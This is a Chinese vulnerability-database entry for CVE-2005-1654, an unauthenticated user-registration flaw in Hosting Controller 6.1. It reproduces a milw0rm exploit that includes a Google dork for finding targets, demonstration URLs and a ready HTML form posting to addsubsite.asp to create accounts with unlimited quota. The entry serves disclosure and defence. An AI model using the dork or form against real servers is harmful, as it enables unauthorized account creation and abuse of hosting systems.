Hosting Controller 漏洞

Hosting Controller 漏洞

漏洞ID 1108751 漏洞类型 未知
发布时间 2005-05-04 更新时间 2005-10-20
图片[1]-Hosting Controller 漏洞-安全小百科CVE编号 CVE-2005-1654
图片[2]-Hosting Controller 漏洞-安全小百科CNNVD-ID CNNVD-200505-1104
漏洞平台 Windows CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/979
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200505-1104
|漏洞详情
HostingController6.1Hotfix1.9及更早版本允许远程攻击者通过直接请求带有设置好的登录名和密码的addsubsite.asp来注册任意用户。
|漏洞EXP
<!--
Tested 

google = intext:"powered by Hosting Controller" intitle:"Hosting Controller"

/str0ke

Advisory Information
-------------------------
Software Package   : Hosting Controller
Vendor Homepage  : http://www.hostingcontroller.com
Platforms               : Windows based servers
Vulnerability           : unauthenticated user registeration
Risk                       : High!
Vulnerable Versions: All version ( Tested on: v.6.1 Hotfix 1.9 )
Vendor Contacted   : 5/3/2005
Release Date          : 5/5/2005

Summary
------------
Hosting Controller is a complete array of Web hosting automation tools for
the Windows Server family platform.
This vulnerability is on the admin/hosting/addsubsite.asp
Attacker can create user and host on the target system.

Exploit
---------
A demonstration exploit URL is provided:

http://[target]/admin/hosting/addsubsite.asp?loginname=Mouse&password=123456
http://[target]:8077/hosting/addsubsite.asp?loginname=Mouse&password=123456
-->

<FORM action="http://[target]/admin/hosting/addsubsite.asp" method="post">
<INPUT type="hidden" name="reseller" value="resadmin" id="reseller" >
<INPUT type="hidden" name="domaintypecheck" value="SECOND" id="Hidden1">
Domain:     <INPUT name="DomainName" value="shabgard.org" id="Hidden2"><BR>
Username: <INPUT name="loginname" value="Mouse" id="Hidden3"><BR>
<INPUT type="hidden" name="Quota" value="-1" id="Hidden4">
<INPUT type="hidden" name="htype" value="27" id="htype" >
<INPUT type="hidden" name="choice" value="1" id="Hidden7" >
<INPUT type="hidden" name="mailaccess" value="TRUE" id="Hidden5">
Mailserver: <INPUT name="MailServerType" value="IMail" id="Hidden6"><BR>
Password:  <INPUT name="password" value="123456" id="Hidden8"><BR><BR>
<input type="submit" value="Make"><BR>

# milw0rm.com [2005-05-04]
|参考资料

来源:MISC
链接:http://isun.shabgard.org/hc3.txt
来源:SECUNIA
名称:15271
链接:http://secunia.com/advisories/15271

相关推荐: SquirrelMail SquirrelSpell Remote Shell Command Execution Vulnerability

SquirrelMail SquirrelSpell Remote Shell Command Execution Vulnerability 漏洞ID 1102548 漏洞类型 Input Validation Error 发布时间 2002-01-24 更…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享